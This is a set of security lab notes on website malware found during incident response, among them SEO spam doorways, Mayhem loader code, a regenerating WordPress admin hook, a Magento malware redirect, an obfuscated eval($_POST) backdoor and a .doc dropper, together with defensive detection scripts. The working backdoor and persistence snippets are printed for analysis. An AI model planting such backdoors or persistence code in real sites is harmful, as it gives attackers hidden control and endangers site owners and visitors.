Soccer spam. Really?

In the last few months, we've covered several cases of SEO Spam in our labs and blog that were promoting products and services ranging from essay writing to sunglasses. From time to time, these Spam campaigns change and attackers focus on topics that may bring additional revenue. This time around, the topic was Soccer 🙂


During an Incident Response process, we found several files in the website's root folder that had nothing to do with the actual website content. Those files had PHP extensions, and their filenames were either just numbers (e.g. 1.php, 2.php, 5.php, ...) or soccer team names; for instance, Real-Madrid.php, Barcelona.php, Chelsea.php, etc.

When accessing those files on a browser, we see an attempt to impersonate a Swedish online store, as you can see in the following screenshots:

In addition to that, there's a hidden iframe loaded at the bottom of the page, pointing to hxxp://www[.]fabriksforsaljning[.]com (the domain doesn't seem to exist anymore).

Remember that removing the offending files will not prevent your site from being attacked and infected again, since those files were uploaded through a backdoor or with stolen/leaked credentials for your site. Check your access logs and FTP logs for any strange activity; this will help identify the malicious code used to upload those files. Also, if you need professional security assistance to clean up your website, let us know.
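As an added example (not code from the original post), the log check suggested above can be scripted: parse combined-format access log lines, ignore requests to PHP files you know belong to the site, and summarize the rest, flagging POSTs and purely numeric file names like the ones in this campaign. The log lines, IPs and known-file list below are constructed samples, and the function names are my own.

```python
# Added example, not code from the original post: flag requests to PHP files
# that are not part of the site's known file set, from combined-format access
# logs. The log lines and the known-file list below are constructed samples.
import re

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) \S+'
)
NUMERIC_NAME = re.compile(r"^/\d+\.php$", re.I)


def parse_line(line):
    """Parse one combined-log line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["path"] = rec["path"].split("?", 1)[0]  # drop the query string
    return rec


def find_unknown_php_requests(log_lines, known_paths):
    """Return {path: summary} for requested .php paths absent from known_paths.

    The summary records hit count, distinct client IPs, number of POSTs
    (a POST to an unexplained PHP file is the classic backdoor shape) and
    whether the file name is just a number, as in the campaign above.
    """
    known = {p if p.startswith("/") else "/" + p for p in known_paths}
    report = {}
    for line in log_lines:
        rec = parse_line(line)
        if rec is None or not rec["path"].lower().endswith(".php"):
            continue
        if rec["path"] in known:
            continue
        entry = report.setdefault(rec["path"], {
            "hits": 0, "ips": set(), "posts": 0,
            "first_seen": rec["ts"],
            "numeric_name": bool(NUMERIC_NAME.match(rec["path"])),
        })
        entry["hits"] += 1
        entry["ips"].add(rec["ip"])
        if rec["method"] == "POST":
            entry["posts"] += 1
    return report


# Constructed sample: two legitimate requests and two to files that were not
# part of the site (a team-named page and a numeric one receiving a POST).
SAMPLE_LOG = [
    '203.0.113.7 - - [10/May/2017:09:12:01 +0000] "GET /index.php HTTP/1.1" 200 5123 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [10/May/2017:09:12:05 +0000] "GET /Real-Madrid.php HTTP/1.1" 200 8840 "-" "Mozilla/5.0"',
    '198.51.100.4 - - [10/May/2017:09:13:10 +0000] "POST /5.php HTTP/1.1" 200 312 "-" "python-requests/2.9"',
    '198.51.100.4 - - [10/May/2017:09:13:11 +0000] "GET /wp-login.php?redirect_to=%2F HTTP/1.1" 200 2100 "-" "Mozilla/5.0"',
]
KNOWN_PATHS = {"/index.php", "/wp-login.php"}

if __name__ == "__main__":
    for path, info in sorted(find_unknown_php_requests(SAMPLE_LOG, KNOWN_PATHS).items()):
        print(path, info)
```

The known-file set is best generated from a clean copy of the site (or the CMS package plus your own files); anything requested outside it, especially with POST traffic from a single IP, is the first place to look.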

Mayhem malware still in the wild

Years ago, colleagues from Yandex introduced the concept of Mayhem infections.

In that post, they provided very detailed information about the malware, its functionalities and capabilities.


The interesting point of this malicious code is the mechanism it uses to plant itself in the system. Even if the site on an infected server is restored from a backup and PHP is reinstalled, the malware is still there, because a compiled shared object is copied onto the system and runs as a service.

During an Incident Response investigation, we found that the Mayhem malware family is still in the wild, so we wanted to point out a few changes. This malware targets both 32-bit and 64-bit architectures and chooses which version of the shared object to load according to the current system's architecture, as you can see below:

$arch = 64;
// on a 32-bit PHP build the 64-bit integer literal overflows to PHP_INT_MAX
if (intval("9223372036854775807") == 2147483647)
    $arch = 32;
$so = $arch == 32 ? $so32 : $so64;

Here's the code for copying and starting the malware:

$f = fopen("/usr/bin/host", "rb");
if ($f) {
    // patch byte 7 (EI_OSABI) of the embedded shared object to match the system's own binaries
    $n = unpack("C*", fread($f, 8));
    $so[7] = sprintf("%c", $n[8]);
    fclose($f);
}
$n = file_put_contents("./jquery.so", $so);
$AU = @$_SERVER["SERVER_NAME"] . $_SERVER["REQUEST_URI"];
$HBN = basename("/usr/bin/host");
$SCP = getcwd();
// shell script: kill the legitimate host process, relaunch it with the malicious object preloaded, then remove itself
@file_put_contents("1.sh", "#!/bin/sh\ncd '" . $SCP . "'\nif [ -f './jquery.so' ];then killall -9 $HBN;export AU='" . $AU . "'\nexport LD_PRELOAD=./jquery.so\n/usr/bin/host\nunset LD_PRELOAD\ncrontab -l|grep -v '1.sh'|grep -v crontab|crontab\nfi\nrm 1.sh\nexit 0\n");

@chmod("1.sh", 0777);
// schedule the script for immediate execution through at(1)
@system("at now -f 1.sh", $ret);

Unlike the original samples, there is no reference to the MAYHEM_DEBUG system variable anymore. Also, the shared object name was changed from "libworker.so" to "jquery.so".
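As an added example (not code from the original post), here are two host-side checks for the traits just described: a compiled shared object dropped into the web root, which you can find by its ELF magic regardless of the name it was given, and a running process whose environment still carries LD_PRELOAD. The function names are my own, and the sample directory used in testing is constructed.

```python
# Added example, not code from the original post: host-side checks for the two
# persistence traits described above, a compiled shared object dropped into the
# web root and a process running with LD_PRELOAD set. Function names are mine.
import glob
import os

ELF_MAGIC = b"\x7fELF"


def find_elf_in_webroot(root):
    """Return files under root whose first bytes are the ELF magic, regardless
    of extension. Web content has no reason to contain native code objects."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                with open(path, "rb") as fh:
                    head = fh.read(len(ELF_MAGIC))
            except OSError:
                continue
            if head == ELF_MAGIC:
                hits.append(os.path.relpath(path, root))
    return sorted(hits)


def ld_preload_from_environ(raw_environ):
    """Extract LD_PRELOAD from a NUL-separated /proc/<pid>/environ blob, or None."""
    for item in raw_environ.split(b"\0"):
        if item.startswith(b"LD_PRELOAD="):
            return item.split(b"=", 1)[1].decode("utf-8", errors="replace")
    return None


def processes_with_ld_preload(proc_dir="/proc"):
    """Map pid -> LD_PRELOAD value for live processes whose environment carries
    it (Linux only; processes you cannot read are skipped silently)."""
    found = {}
    for env_path in glob.glob(os.path.join(proc_dir, "[0-9]*", "environ")):
        try:
            with open(env_path, "rb") as fh:
                value = ld_preload_from_environ(fh.read())
        except OSError:
            continue
        if value is not None:
            pid = os.path.basename(os.path.dirname(env_path))
            found[pid] = value
    return found


if __name__ == "__main__":
    import sys
    webroot = sys.argv[1] if len(sys.argv) > 1 else "."
    print("ELF objects under web root:", find_elf_in_webroot(webroot))
    print("processes with LD_PRELOAD:", processes_with_ld_preload())
```

Run it as root so every process environment is readable; a `host` process with LD_PRELOAD pointing into the web root is exactly the shape of the script above. Checking the magic bytes rather than the extension matters because the file name is whatever the attacker chose (here jquery.so, earlier libworker.so).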

To prevent attacks that exploit vulnerabilities in your site software, we suggest using a Web Application Firewall (WAF).

SEO spam loading from external site

Many websites get compromised and used for SEO purposes, in order to drive traffic to other websites that would usually be ranked very low or completely removed by Google because of their content. Recently I found some malware pulling spam content from chinajianzhan[.]cn.


The script the attackers injected is very simple: it uses the file_get_contents() function to request the crafted URL with a specific User-Agent, and the remote server answers that User-Agent with the spam content. Serving the content only to that User-Agent helps them hide the spam source from search engines.

Here is the snippet:

<?php
set_time_limit(0);
header("Content-Type: text/html;charset=gb2312");
$Remote_server = "hxxp://www[.]chinajianzhan[.]cn/bc/";
$host_name = "http://" . $_SERVER['SERVER_NAME'] . $_SERVER['PHP_SELF'];
$userAgent = $_SERVER['HTTP_USER_AGENT'];
$Content_mb = getHTTPPage($Remote_server . "/index.html?host=" . $host_name);
echo $Content_mb;
exit();

function getHTTPPage($url) {
    // fetch the spam page with the fixed User-Agent the remote server expects
    $opts = array('http' => array('method' => "GET", 'header' => "User-Agent: aQ0O010O"));
    $context = stream_context_create($opts);
    $html = @file_get_contents($url, false, $context);
    if (empty($html)) {
        exit("<p align='center'><font color='red'><b>Connection Error!</b></font></p>");
    }
    return $html;
}

The original version of the code was encoded using vidun[.]com, and the code was added to randomly named files like can.php and michao.php.

Here is an excerpt of the original code:

<?php // This file is protected by copyright law & provided under license. Copyright(C) 2005-2009 www.vidun.com, All rights reserved. $OOO0O0O00=__FILE__;$OOO000000=urldecode('%74%68%36%7 (Trimmed) Vfe48R3E+wJL7eWp9eWpZcbO1FM4Ikoi0dBX7eWp9eWP=

We highly recommend keeping your WordPress up to date and making sure that all of your passwords are unique and secure. The impact of SEO spam on your website can be very large: your website could rank lower in search results and also be blacklisted, which can take many weeks to resolve.
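As an added example (not code from the original post), here is a check you can run against your own pages for this kind of SEO spam. Doorway files like the one above return pages full of links to the sites being promoted, so listing the external hosts a page links to already exposes them; the second function goes a step beyond this case and compares what the site returns to a crawler with what it returns to a browser, which catches variants that cloak the spam by User-Agent. The fetch function is injected so the logic runs offline; the HTML, hosts and function names are constructed by me.

```python
# Added example, not code from the original post: list the external hosts a page
# links to, and compare crawler-facing and browser-facing responses to detect
# User-Agent cloaking. `fetch` is injected so the check can run offline.
import re

LINK_RE = re.compile(r'<a\b[^>]*\bhref\s*=\s*["\']([^"\']+)["\']', re.I)
HOST_RE = re.compile(r'^(?:[a-z][a-z0-9+.-]*:)?//([^/?#:]+)', re.I)


def external_hosts(html, own_host):
    """Hosts linked from `html` other than the site itself (relative links are skipped)."""
    hosts = set()
    for href in LINK_RE.findall(html):
        m = HOST_RE.match(href.strip())
        if m and m.group(1).lower() != own_host.lower():
            hosts.add(m.group(1).lower())
    return hosts


def crawler_only_hosts(url, own_host, fetch,
                       crawler_ua="Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)",
                       browser_ua="Mozilla/5.0 (Windows NT 10.0; Win64; x64) Firefox/52.0"):
    """Hosts present in the response served to a crawler but absent from the
    one served to a browser: content your visitors never see, but Google does."""
    crawler = external_hosts(fetch(url, crawler_ua), own_host)
    browser = external_hosts(fetch(url, browser_ua), own_host)
    return sorted(crawler - browser)


# Constructed responses standing in for a compromised page: spam links are only
# returned when the request looks like a search-engine crawler.
CLEAN_HTML = '<html><body><a href="https://shop.example/about">About</a></body></html>'
SPAM_HTML = CLEAN_HTML.replace(
    "</body>",
    '<div style="display:none"><a href="http://cheap-pills.invalid/x">buy</a>'
    '<a href="http://essay-mill.invalid/y">essays</a></div></body>')


def fake_fetch(url, user_agent):
    """Offline stand-in for an HTTP fetch (constructed behaviour)."""
    return SPAM_HTML if "Googlebot" in user_agent else CLEAN_HTML


def live_fetch(url, user_agent, timeout=10):
    """Real fetch for use against your own site outside of tests."""
    from urllib.request import Request, urlopen
    req = Request(url, headers={"User-Agent": user_agent})
    with urlopen(req, timeout=timeout) as resp:
        return resp.read().decode("utf-8", errors="replace")


if __name__ == "__main__":
    print(crawler_only_hosts("https://shop.example/", "shop.example", fake_fetch))
```

Pass `live_fetch` in place of `fake_fetch` to check a real page; any host that only shows up for the crawler deserves a look at the file serving that URL.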

Evil Self-Regenerating WordPress Administrator User

Attackers often aim to conceal their presence using different methods, such as injecting redirect scripts, creating spam pages, or hiding a mailer in checkout pages to steal credit cards; but this is not always the case.


We've seen some websites where hackers were doing the very opposite. Recently, we noticed a malicious administrative user who had managed to make their account permanent. When the actual website administrator attempted to remove the bad guy, WordPress reported that the user was successfully deleted. However, after reopening the Users tab, the unwanted admin user appeared again as if nothing had happened.

Such behavior gives the impression that the user is a permanent part of the system since they remained in the Users tab!

After the investigation, we found that the following code had been injected into the website theme's functions.php file:

function admin_account() {
    $user  = 'admin2';
    $pass  = 'Abc12345!';
    $email = 'email2@domain.com';
    if ( !username_exists( $user ) && !email_exists( $email ) ) {
        $user_id = wp_create_user( $user, $pass, $email );
        $user = new WP_User( $user_id );
        $user->set_role( 'administrator' );
    }
}
add_action('init', 'admin_account');

What does this snippet mean? The code is pretty simple. We can see that it defines a function named admin_account. It specifies only the three parameters required for user creation: user, password, and email.

Then the if conditional statement checks whether the user is already present on the system and, if not, creates a new one. So the regenerating function is ready. What next?

The function needs to be triggered quite often so that the bad user can regenerate immediately. For that purpose, the attackers added the last part of the code, binding the admin_account function to the init action, which is triggered once most of WordPress has loaded.

Removing the mentioned code from functions.php file ceased the "immortality" of the bad user and evil was banished.

Most of the time, attackers will inject malware into different parts of your system to maintain access to the compromised website, even if the obvious backdoor is removed. Knowing your site's structure and actively monitoring it (being alerted whenever a file is changed or added to your site) will help you identify alien admin users and unwanted code injections.
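As an added example (not code from the original post), the monitoring just recommended can be as simple as a hashed baseline of the theme directory that you compare against on a schedule; on top of the added/modified/removed report, the script greps every changed PHP file for the user-creation calls seen in the snippet above, which is how a hook like admin_account would surface. The file names, paths and function names here are my own, and the test tree is constructed.

```python
# Added example, not code from the original post: a minimal file-integrity
# baseline for a theme directory, plus a check of changed PHP files for the
# user-creation calls seen in the injected snippet above. Paths and names are
# illustrative assumptions.
import hashlib
import json
import os
import re

# wp_create_user / wp_insert_user are the WordPress functions that create
# accounts; set_role('administrator') is what elevates the new account.
ADMIN_CREATION_MARKERS = re.compile(
    rb"wp_create_user\s*\(|wp_insert_user\s*\(|set_role\s*\(\s*['\"]administrator['\"]"
)


def build_manifest(root):
    """Map relative path -> SHA-256 for every file under root."""
    manifest = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            h = hashlib.sha256()
            with open(path, "rb") as fh:
                for chunk in iter(lambda: fh.read(65536), b""):
                    h.update(chunk)
            manifest[os.path.relpath(path, root)] = h.hexdigest()
    return manifest


def diff_manifests(baseline, current):
    """Added, removed and modified paths between two manifests."""
    return {
        "added": sorted(set(current) - set(baseline)),
        "removed": sorted(set(baseline) - set(current)),
        "modified": sorted(p for p in baseline if p in current and baseline[p] != current[p]),
    }


def files_creating_admins(root, paths):
    """Among `paths` (relative to root), the PHP files containing user-creation calls."""
    hits = []
    for rel in paths:
        if not rel.lower().endswith(".php"):
            continue
        with open(os.path.join(root, rel), "rb") as fh:
            if ADMIN_CREATION_MARKERS.search(fh.read()):
                hits.append(rel)
    return sorted(hits)


def check_against_baseline(root, baseline_file):
    """Compare root with the stored baseline (creating it on first run) and
    return the diff plus the changed PHP files that now create users."""
    current = build_manifest(root)
    if not os.path.exists(baseline_file):
        with open(baseline_file, "w") as fh:
            json.dump(current, fh, indent=1, sort_keys=True)
        return {"baseline_created": True}
    with open(baseline_file) as fh:
        baseline = json.load(fh)
    diff = diff_manifests(baseline, current)
    diff["creates_users"] = files_creating_admins(root, diff["added"] + diff["modified"])
    return diff


if __name__ == "__main__":
    import sys
    theme_dir = sys.argv[1] if len(sys.argv) > 1 else "wp-content/themes/mytheme"
    print(json.dumps(check_against_baseline(theme_dir, "theme-baseline.json"), indent=1))
```

Keep the baseline file outside the web root (and refresh it only after you have reviewed a legitimate update), otherwise an attacker who can write to the site can simply rewrite the baseline too.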

If you see your site having unwanted administrator users but you can’t locate the code that is creating them, you might want to have us scan your site for malware and clean it.

When Online Shopping leads to Malware download

Recently, during an incident response process, we worked on an interesting Magento website. This site was reported to have a strange redirection when users visited it. Without further ado, we started investigating the issue on this site.


The site loaded pretty slowly on our end, which didn't look right. There was something holding the site back. After further checking, we found a JavaScript include with a suspicious URL in the page source, as below:

<script type="text/javascript" src=" hXXp://aleinvest[.]xyz/js/js"></script>

We discovered that this is a conditional URL: on the first check we could see JavaScript code, but on the next check the code wouldn't display anymore. Luckily we saved the JavaScript code on that first request. It redirected the user to download an executable file named 'plugin.exe' from a Dropbox shared link, as below:

function process() {
    window.location = "hXXps://www.dropbox[.]com/<snipped>/plugin.exe?dl=1";
}
window.onerror = process;
process();

We were able to download the 'plugin.exe' file (SHA256: 21f453cc5885ca7fbbb94bb0e54158c11c043318c794f7266158e7bb00190080) and quickly uploaded it to VirusTotal to get an overview of the threat. VirusTotal reported a 34/59 detection ratio for this file, which shows pretty clearly that it is malware.

Having confirmed that the component was malicious, we went back to the site infrastructure to find its source. It wasn't long before we figured out that the JavaScript include had been stored inside the Magento database, in the core_config_data table, as shown in the screenshot below:

Right after the piece of code was removed from the database, the site started loading way faster than before. Luckily the site hasn’t been flagged nor blacklisted by Google, so we could skip the blacklist removal request procedure for now.
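As an added example (not code from the original post), this is a check you can run over an export of core_config_data rows: it pulls every `<script src=...>` out of the stored values and reports the ones whose host is not on your allow-list, which is exactly where the include above was hiding. The rows below are constructed by me; design/head/includes and design/footer/absolute_footer are real Magento 1 configuration paths, while the malicious host is a placeholder standing in for the one in the post. Function names are my own.

```python
# Added example, not code from the original post: scan exported core_config_data
# rows for <script> tags that load from hosts outside an allow-list. The rows
# below are constructed; the host is a placeholder, not the real indicator.
import re

SCRIPT_SRC_RE = re.compile(r'<script\b[^>]*\bsrc\s*=\s*["\']\s*([^"\']+?)\s*["\']', re.I)
HOST_RE = re.compile(r'^(?:[a-z][a-z0-9+.-]*:)?//([^/?#:]+)', re.I)


def script_sources(value):
    """All src= values of <script> tags inside one config value."""
    return SCRIPT_SRC_RE.findall(value or "")


def find_external_scripts(rows, allowed_hosts):
    """rows: iterable of (config_path, value). Returns (config_path, src, host)
    for every script include whose host is not allowed. A src with no host
    (relative path) is treated as local and skipped."""
    allowed = {h.lower() for h in allowed_hosts}
    findings = []
    for config_path, value in rows:
        for src in script_sources(value):
            m = HOST_RE.match(src)
            if not m:
                continue
            host = m.group(1).lower()
            if host not in allowed:
                findings.append((config_path, src, host))
    return findings


# Constructed rows mimicking a core_config_data export. Note the leading space
# inside the src attribute, as in the include quoted in the post.
CONSTRUCTED_ROWS = [
    ("design/head/includes",
     '<link rel="stylesheet" href="/skin/frontend/base/default/css/styles.css">\n'
     '<script type="text/javascript" src="//cdn.example/jquery.min.js"></script>\n'
     '<script type="text/javascript" src=" http://malicious-cdn.invalid/js/js"></script>'),
    ("design/footer/absolute_footer", '<script src="/js/tracking.js"></script>'),
    ("web/unsecure/base_url", "http://shop.example/"),
]
ALLOWED = {"shop.example", "cdn.example"}

if __name__ == "__main__":
    for finding in find_external_scripts(CONSTRUCTED_ROWS, ALLOWED):
        print(finding)
```

In practice feed it the result of `SELECT path, value FROM core_config_data` and keep the allow-list to hosts you actually serve assets from; anything else in a head or footer include is worth a second look, even if it appears to serve nothing, since this one only returned its payload once.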

A quick Google search for this threat turns up only a few related infections so far, but all of them are on Magento websites.

If you look into our previous labs notes related to Magento sites, most of the threats are heavily associated with credit card stealers. Fret not! Whether it is credit card stealers, blackhat SEO, or even malware redirects, let us know if you want professional security help. We are here to secure and protect your Magento website!

Small One-liner Backdoor

During an incident response investigation, we detected an interesting backdoor that was small but had the potential to give the attacker full access to your website and all its content.

Let’s review the backdoor content which was placed into the wp-content/themes/newaffpower/functions.php file:

@$A='Acc';$p='_';$o='PO';$s='S';$t='T';;@eval(${$p.$o.$s.$t}['WordPass']);

The attacker placed the code at the bottom of a legitimate file; when the file is requested with the required POST field, it gives the attacker full access to the website.

Let’s work through the malicious code step by step to see how it works and how it enables the attacker to gain access to your website files.

First, the variable $A is set to ‘Acc’ but is not used during the attack:

@$A='Acc';

The attacker then assigns individual fragments which are later concatenated into the name of the superglobal that holds the malicious payload:

$p='_';
$o='PO';
$s='S';
$t='T';;

The final part of the attack is where the attacker includes his malicious payload in the 'WordPass' POST parameter. (It looks like 'WordPress', but even 'WordPress' would not make it any more legitimate.)

@eval(${$p.$o.$s.$t}['WordPass']);

The complete piece of malicious code would look like the string below.

@eval($_POST['WordPass']);

In the screenshot below, I’m simulating a POST request to the website in order to gain access to important files on the server.

This will execute any content passed by the attacker that could give the attacker full access to your website files/folders.
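As an added example (not code from the original post), the step-by-step resolution above can be automated when you are triaging files: collect the single-quoted string constants assigned in the file, substitute them into every `${$a.$b...}` variable-variable expression, and then report any eval() whose argument comes straight from request data. It generalizes the one-liner to any number of fragments and also catches the plain `eval($_POST[...])` form. Function names and the extra sample inputs are my own; the one-liner itself is the one from the post.

```python
# Added example, not code from the original post: resolve PHP variable-variable
# obfuscation of the shape ${$a.$b.$c} by substituting the single-quoted string
# constants assigned earlier in the same file, then report eval() of request
# data. Function names and sample inputs other than the post's one-liner are mine.
import re

ASSIGN_RE = re.compile(r"\$([A-Za-z_]\w*)\s*=\s*'((?:[^'\\]|\\.)*)'\s*;")
VARVAR_RE = re.compile(r"\$\{\s*((?:\$[A-Za-z_]\w*\s*\.\s*)*\$[A-Za-z_]\w*)\s*\}")
EVAL_INPUT_RE = re.compile(r"@?\beval\s*\(\s*\$(\w+)\s*\[\s*['\"]([^'\"]+)['\"]\s*\]")
REQUEST_SUPERGLOBALS = {"_POST", "_GET", "_REQUEST", "_COOKIE", "_FILES", "_SERVER"}
# zero-width characters are sometimes sprinkled into such code to defeat naive grep
ZERO_WIDTH = re.compile("[\u200b\u200c\u200d\u2060\ufeff]")


def resolve_variable_variables(code):
    """Replace ${$x.$y...} with the variable name its fragments spell out.
    Only literal single-quoted assignments are substituted; escapes inside the
    literal are kept as written."""
    code = ZERO_WIDTH.sub("", code)
    consts = dict(ASSIGN_RE.findall(code))

    def substitute(m):
        names = [part.strip()[1:] for part in m.group(1).split(".")]
        if all(n in consts for n in names):
            return "$" + "".join(consts[n] for n in names)
        return m.group(0)  # cannot resolve statically, leave untouched

    return VARVAR_RE.sub(substitute, code)


def find_eval_of_request_data(code):
    """Return (resolved_code, [(superglobal, key), ...]) for eval() calls that
    execute request-supplied data, whether written plainly or via ${...}."""
    resolved = resolve_variable_variables(code)
    hits = [(g, k) for g, k in EVAL_INPUT_RE.findall(resolved) if g in REQUEST_SUPERGLOBALS]
    return resolved, hits


# The one-liner from the post, as found at the bottom of functions.php.
ONE_LINER = "@$A='Acc';$p='_';$o='PO';$s='S';$t='T';;@eval(${$p.$o.$s.$t}['WordPass']);"

if __name__ == "__main__":
    resolved, hits = find_eval_of_request_data(ONE_LINER)
    print(resolved)
    for superglobal, key in hits:
        print("eval of request data:", superglobal, key)
```

Run over every PHP file of a site it gives you both the deobfuscated line and the parameter name, which is then easy to search for in the access logs.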

If you want to be sure that your website is not infected, or if you need help cleaning it up, let us know.

JavaScript Used to Generate Malicious Documents

When talking about compromised environments, we often think that the website itself is the end goal but that’s not always true. In some cases, attackers shift their focus to the user instead, especially when the website has lots of traffic.

Attackers may use different techniques, and one we see often is a malware dropper. A dropper is not necessarily the malware that causes the damage itself; its main objective is simply to download another piece of malicious code (the real malware) that then carries out the tasks the attackers want.

During a website investigation, we detected a few JavaScript files being executed as PHP to generate other malicious files (extension: .doc, the malware dropper). You can see some of the code below. It shows the file name being assigned and the file then being offered to the user for download:

<?php
private $contentName_ = 'EHU-96470130.dokument.doc';
private $contentType_ = 'application/msword';

public function execute()
{
    $sp363bd2 = '.' . md5(md5(basename(dirname(__FILE__))));
    touch($sp363bd2);
    $spa7a53d = fopen($sp363bd2, 'r+');

    // content clipped, too long.

    header('Cache-Control: no-cache, no-store, max-age=0, must-revalidate');
    header('Pragma: no-cache');
    header('Content-Type: ' . $this->contentType_);
    header('Content-Disposition: attachment; filename="' . $this->contentName_ . '"');
    header('Content-Transfer-Encoding: binary');
    die(base64_decode($this->content_));
}

Additional file info:

$ file EHU-96470130.dokument.doc
EHU-96470130.dokument.doc: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1251, Author: admin, Template: Normal.dotm, Last Saved By: admin, Revision Number: 2, Name of Creating Application: Microsoft Office Word, Create Time/Date: Wed May  3 14:19:00 2017, Last Saved Time/Date: Wed May  3 14:19:00 2017, Number of Pages: 1, Number of Words: 0, Number of Characters: 1, Security: 0

When running that file against VirusTotal, 35 out of 57 engines detected the code (mostly as W97M.Downloader, a well-known Word macro trojan).

Whenever a user visited a specific page on the compromised website, a download of the .doc file was triggered. If opened on the user's machine, it would download another trojan, giving the attacker control of the user's OS.
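As an added example (not code from the original post), here is a scan for the two things that make this case possible: files with a non-PHP extension (.js here) that nevertheless contain a PHP open tag, and .htaccess directives that hand such extensions to the PHP handler so the server executes them. The function names and the sample tree are my own.

```python
# Added example, not code from the original post: find script files that carry
# PHP code and .htaccess directives that hand non-PHP extensions to the PHP
# handler, the combination that lets a ".js" file run as PHP as described above.
# Function names and the sample tree are mine.
import os
import re

PHP_TAG_RE = re.compile(rb"<\?php\b|<\?=")
# Apache directives that can bind an extension or a directory to the PHP handler
HANDLER_RE = re.compile(r"^\s*(AddHandler|AddType|SetHandler|ForceType)\s+(\S+)(.*)$", re.I | re.M)


def non_php_files_with_php_tags(root, extensions=(".js", ".css", ".txt", ".ico", ".jpg", ".png")):
    """Files with a non-PHP extension whose content contains a PHP open tag."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(extensions):
                continue
            path = os.path.join(dirpath, name)
            with open(path, "rb") as fh:
                if PHP_TAG_RE.search(fh.read()):
                    hits.append(os.path.relpath(path, root))
    return sorted(hits)


def php_handler_rules(htaccess_text):
    """(directive, target, [extensions]) for directives that map something to a
    PHP handler or MIME type. SetHandler/ForceType carry no extension list; they
    apply to the directory or the enclosing <FilesMatch> block."""
    rules = []
    for directive, target, rest in HANDLER_RE.findall(htaccess_text):
        if "php" in target.lower():
            rules.append((directive, target, rest.split()))
    return rules


def scan_webroot(root):
    """Run both checks over a web root and return one report."""
    report = {"php_in_static_files": non_php_files_with_php_tags(root), "handler_rules": {}}
    for dirpath, _dirs, files in os.walk(root):
        if ".htaccess" in files:
            path = os.path.join(dirpath, ".htaccess")
            with open(path, "r", errors="replace") as fh:
                rules = php_handler_rules(fh.read())
            if rules:
                report["handler_rules"][os.path.relpath(path, root)] = rules
    return report


if __name__ == "__main__":
    import sys
    print(scan_webroot(sys.argv[1] if len(sys.argv) > 1 else "."))
```

A rule mapping only `.php` is normal; one that adds `.js`, `.doc`, `.jpg` or similar is the configuration change to hunt for, and every file it covers should be treated as executable code during the review.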

It's very important to be proactive about the security of your website because, as you can see, the issues may affect much more than just ranking, SEO and online presence; they may also affect your audience.